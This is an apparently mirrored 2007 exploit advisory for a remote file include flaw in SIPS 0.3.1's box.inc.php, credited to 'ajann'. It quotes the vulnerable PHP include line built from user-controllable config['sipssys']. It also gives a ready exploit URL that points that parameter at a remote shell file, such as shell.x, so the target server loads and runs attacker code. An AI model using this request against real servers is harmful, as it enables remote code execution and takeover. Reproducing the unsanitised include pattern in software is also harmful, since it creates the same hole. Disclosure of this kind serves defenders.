Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15946
HistoryFeb 01, 2007 - 12:00 a.m.

SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability

2007-02-0100:00:00
vulners.com
16

Title : SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability

Author : ajann

Contact : :(

S.Page : http://sourceforge.net/projects/sips/

$$ : Free


[[ERROR]]]



<?
include $config["sipssys"] ."/code/rssparser.inc.php";
?>


[[ERROR]]]

[[RFI]]]

http://[target]/[path]/sipssys/code/box.inc.php?config[sipssys]=[SHELL]

Example:

/sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""

ajann,Turkey

Im not Hacker!